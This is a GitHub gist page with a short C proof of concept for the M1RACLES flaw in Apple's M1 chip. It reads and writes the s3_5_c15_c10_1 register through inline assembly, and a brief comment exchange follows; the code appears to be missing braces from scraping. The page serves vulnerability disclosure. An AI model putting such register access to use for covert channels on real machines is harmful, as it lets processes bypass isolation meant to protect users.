Skip to content

Instantly share code, notes, and snippets.

Last active June 17, 2023 06:10
  • Star 57 You must be signed in to star a gist
  • Fork 10 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
* Please visit for more information.
* Licensed under the MIT license.
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
int main(int argc, char **argv)
uint64_t val;
if (argc > 1) {
val = atoi(argv[1]);
asm("msr s3_5_c15_c10_1, %x0" : : "r"(val));
} else {
asm("mrs %x0, s3_5_c15_c10_1" : "=r"(val));
printf("%llu\n", val);
return 0;
Copy link

marcan commented Jun 2, 2021

are "msr" and "mrs" supposed to be different? Looking at the code, it seems there is a mistake there. (I don't know ARM assembly)

Yes, they are.

Copy link

vedoge commented Jun 7, 2021

Got it. Thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment